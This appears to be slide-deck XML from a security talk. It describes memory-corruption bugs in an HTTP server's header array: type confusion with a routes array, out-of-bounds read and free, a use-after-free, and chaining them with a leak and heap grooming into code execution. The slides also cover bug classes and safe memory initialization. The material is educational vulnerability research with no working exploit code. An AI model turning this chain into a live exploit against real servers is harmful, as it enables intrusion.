          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330191" y="4602447"/>
            <a:ext cx="695584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693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53A1-D575-4B40-AC3C-FB8CB00D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Trigger? – Bug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2569-32CC-224C-BD2A-472FFB6AC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Force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>0x20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> headers to be used with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X-Request-Id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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read from next index (0x20) as a header (type confusion) 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Allows for read from index </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng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0x21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(header 22) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>0x21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> headers to be used with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X-Request-Id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Overwritten index 0x20 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Allows for read from index </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng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0x21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(header 0x22) as well</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng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 descr="Out of bounds pointer usage (read) ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0E11B8-F8AC-DE49-8A21-BED1C860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1" y="3602590"/>
            <a:ext cx="9096939" cy="154091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210DEF-A7A0-324B-ADBC-9820BA930DB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532638" y="4664440"/>
            <a:ext cx="818515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479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09E-23FA-224F-BB72-2F7C97AB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0"/>
            <a:ext cx="9926665" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>How to Trigger? – Bug 4 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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8498-BA2E-1F41-BB94-C1C02CE0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0x20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> headers to be used with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X-Request-Id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Allows for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng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free()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from index </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng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0x20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(header 22) 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Potentially free 0x21+ as well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Out of bounds free">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28637AB3-E627-8A44-B00D-2710B4D7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343" y="2387768"/>
            <a:ext cx="5922406" cy="275573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5389B-98DE-AF4A-B730-06EC44657B55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3229343" y="4385471"/>
            <a:ext cx="555819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325498-B63C-B746-BE7E-D16F63425493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3229343" y="4096169"/>
            <a:ext cx="555819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1EEB2D-D125-384F-BC86-5B38A45BEFBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3229343" y="3721626"/>
            <a:ext cx="555819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67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FF96-DB64-DE44-BA8E-264B2826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Determining Exploitability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2" descr="Hacker Images, Stock Photos &amp; Vectors | Shutterstock">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9265C2F2-1E55-9F48-AFF9-B3FD07E04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7853" b="7320"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="628650" y="1369219"/>
            <a:ext cx="3886200" cy="30245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06F0-FEAE-D343-A9FB-71D247DB3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Control over data being written</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory AROUND our array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Grooming capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run the damn code!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POC || GTFO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GDB is your friend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36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93D8-2966-3443-9E09-46999342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res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Diagram </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Header struct data structure">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE6657D4-3862-B84B-8CEB-76172A2C5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7234" y="2218538"/>
            <a:ext cx="8948058" cy="2123268"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2226296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- Diagram</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Routes data structure">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57878591-F9F3-604A-9FB5-B2E117B8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5" y="1206929"/>
            <a:ext cx="8273081" cy="252399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D5FE204-D1D3-CF4D-A4D8-E634BF211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7" t="57754" r="86732" b="33043"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5327542" y="2629234"/>
            <a:ext cx="940545" cy="27669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9787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CB34-81E9-3847-930F-90C50E0C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HTTP Protocol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1BC11A-E2A1-4046-AD4C-54ED5912E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07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92699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272" y="4372567"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="res_header_lst overflow into routes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02018268-249A-9945-916E-2C73E69A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51" y="64623"/>
            <a:ext cx="7780150" cy="3371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4EC652-D1B8-D844-9362-4118D21CCF76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154265" y="1611823"/>
            <a:ext cx="1580827" cy="404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outes data structure">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2790EBE2-6644-5440-9651-FDC4CA1D4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114" t="37901" r="22274" b="53195"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6393052" y="2385770"/>
            <a:ext cx="1208868" cy="22472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EE19866-9C6D-5C42-9BB2-839D7079F8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67" t="57754" r="86732" b="33043"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6404674" y="2791966"/>
            <a:ext cx="848533" cy="24962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7697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3501" y="4182613"/>
            <a:ext cx="8895058" cy="796667"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitability – Type Confusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="res_header_lst overflow into routes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02018268-249A-9945-916E-2C73E69A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51" y="64623"/>
            <a:ext cx="7780150" cy="3371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4EC652-D1B8-D844-9362-4118D21CCF76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154265" y="1611823"/>
            <a:ext cx="1580827" cy="404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ata within a route">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EB97566-71F0-F243-8BA1-4043B7BD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672" y="3508711"/>
            <a:ext cx="7097579" cy="79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9B391-B453-654B-8C0E-873EA265D5AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154265" y="2274978"/>
            <a:ext cx="224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﻿0x55555555e3b0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166E8-2781-6548-8485-2A2B7B883BCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154265" y="2686222"/>
            <a:ext cx="224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﻿﻿0x55555555e440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96528C-F42E-2C40-9603-A41ACDB944E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154265" y="3038245"/>
            <a:ext cx="224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﻿﻿0x55555555e4d0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3FA34-CFFC-0B4B-B9F4-9B08F4DB750F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="956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/>
              <a:t>Read</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Routes data structure">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F120A93-F2A9-0544-8188-12FC7A3713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14" t="37901" r="22274" b="53195"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6393052" y="2385770"/>
            <a:ext cx="1208868" cy="224726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FC92828F-7374-9547-9E65-0D7E3AD1B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7" t="57754" r="86732" b="33043"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6404674" y="2791966"/>
            <a:ext cx="848533" cy="24962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97310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43261"/>
            <a:ext cx="8965769" cy="994172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Exploitability – Type Confusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="res_header_lst overflow into routes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02018268-249A-9945-916E-2C73E69A7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69"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1363851" y="64623"/>
            <a:ext cx="7780150" cy="2182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4EC652-D1B8-D844-9362-4118D21CCF76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154265" y="1611823"/>
            <a:ext cx="1580827" cy="404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3FA34-CFFC-0B4B-B9F4-9B08F4DB750F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9559"/>
            <a:ext cx="1797803" cy="243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/>
              <a:t>Read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not useful..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D75C58E-54A7-424D-A168-56F208981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477" y="2302007"/>
            <a:ext cx="4661330" cy="23173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4ECD4B-B632-A648-BAA7-DF63DE629624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2092271"/>
            <a:ext cx="2681207" cy="209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36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, table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE2858BD-095B-6E47-8A9D-D40E6929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59" y="156012"/>
            <a:ext cx="8074941" cy="3859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43261"/>
            <a:ext cx="8965769" cy="994172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Exploitability – Type Confusion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3FA34-CFFC-0B4B-B9F4-9B08F4DB750F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9559"/>
            <a:ext cx="1797803" cy="243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/>
              <a:t>Write</a:t>
            </a:r>
          </a:p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48F69C-E6A9-4E4D-8635-A622A759E339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1917267" y="2502976"/>
            <a:ext cx="1655092" cy="12243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1FDBD-ED68-F44F-AE05-7E9CC3D6D650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1959242" y="2502976"/>
            <a:ext cx="1551123" cy="11680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262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43261"/>
            <a:ext cx="8965769" cy="994172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Exploitability – Type Confusion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3FA34-CFFC-0B4B-B9F4-9B08F4DB750F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5067946" y="3733172"/>
            <a:ext cx="1797803" cy="243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E04B651-746F-8B40-9C29-B84D75FD02E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-79302"/>
            <a:ext cx="2239501" cy="124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Free()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C9832B7-6A60-D14C-BD7D-F5AE0370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029"/>
            <a:ext cx="8660109" cy="2353290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9166543-D6B9-6444-944D-69773E182066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4846447" y="984969"/>
            <a:ext cx="0" cy="15102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Out of bounds free">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5145D58-329F-304C-8449-8448ED61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66" y="2507181"/>
            <a:ext cx="4719234" cy="2195889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B1769EE-EBF1-5E4B-BD88-4D58B0CBE71D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277456" y="1987192"/>
            <a:ext cx="83626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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6C04820-02D2-B64B-BC71-E12D352EFD1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386380" y="1292351"/>
            <a:ext cx="14600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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B0E86B-669E-1A4D-B273-6E586B2AB34C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277456" y="1292351"/>
            <a:ext cx="83626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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83C97948-8C47-E44C-854D-F66C3727EE7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386380" y="2021597"/>
            <a:ext cx="14600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 descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21104E24-F189-5443-B67F-A4B2876CF9A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4116413" y="469184"/>
            <a:ext cx="14600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7744BF7-6BF4-B945-A9A3-ECCBA3C0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44" y="2495227"/>
            <a:ext cx="4324018" cy="216201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res_header_lst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[0x20] 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== </a:t>
            </a:r>
            <a:b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routes</a:t>
            </a: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Free the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routes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pointer! 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Disgusting UAF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6657BC-7DB0-5246-837C-3711926B5B58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4638833" y="3256978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E3E8F5-081E-5041-87F5-8F0FBD30235A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4670791" y="3523322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DE2B8-9E18-7549-A8B1-617AB8CFA9EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4670791" y="3789665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B5BA1-FB59-3A4F-A982-243AFAE3B0E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4825125" y="959041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922AD0-6DA6-7E49-A9AD-5238EB0EE489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4835786" y="1638881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35FB1-51B3-6B4E-9F3B-5515608F5CCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5467993" y="34932"/>
            <a:ext cx="82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1077463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01DE-1779-2F4B-9205-7277525E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43261"/>
            <a:ext cx="8965769" cy="994172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Exploitability – Type Confusion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3FA34-CFFC-0B4B-B9F4-9B08F4DB750F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5067946" y="3733172"/>
            <a:ext cx="1797803" cy="243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FADD72-78BE-1043-B41F-60C2B6CC4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5227"/>
            <a:ext cx="7886700" cy="2162014"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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&amp;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res_header_lst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[0x20]-&gt;name == routes[0]</a:t>
            </a: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Hard to keep the party going…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E04B651-746F-8B40-9C29-B84D75FD02E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="-79302"/>
            <a:ext cx="1766806" cy="1241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/>
              <a:t>Write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C9832B7-6A60-D14C-BD7D-F5AE0370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029"/>
            <a:ext cx="8660109" cy="2353290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9166543-D6B9-6444-944D-69773E182066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4846447" y="984969"/>
            <a:ext cx="0" cy="15102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445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66D0-C7B7-C244-A27D-085A437B5C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Exploit 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057F4-E4FE-8547-B43C-F45981B2E7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Leak + UAF + Grooming = code execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2841203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D2C2-E34C-164F-A6A8-505DDF56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Info Leak</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="Leak Detection with Penetrant Testing Process">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC9B3BFE-32DA-D84D-B629-F14A70349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4" b="10410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78746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A0BE-1907-0C4F-9EED-74C4DAD1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Bug Classes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7E9D89-BE67-4854-BC65-2934905CB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924831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6878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C148-281A-6044-8784-17A43D12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Way To Initialize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0EC4-7E72-3D4B-907B-67870C39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757"/>
            <a:ext cx="7886700" cy="2813288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set all of the bytes in the pointer to NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Guarantees that everything in initializes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function does this well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> fields/bytes works as well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy to make a mistake here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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Dirty Pipe forgot to do this…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9DBE4-C9B3-9647-B6E8-CD16944F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1" y="1148865"/>
            <a:ext cx="6439319" cy="461687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Mister Folk Distro - Other / Used">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3427A3-AEF2-7947-8D58-641539DE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65" y="170863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7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D20A-0F48-CF4D-BDCF-C7F62B71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HTTP/1.1 Protocol From Afar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5EEC-6237-0D48-BA01-903A509C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Hypertext Transfer Protocol (HTTP) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Human readable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Newline (\r\n) based protocol </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Three distinct parts: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
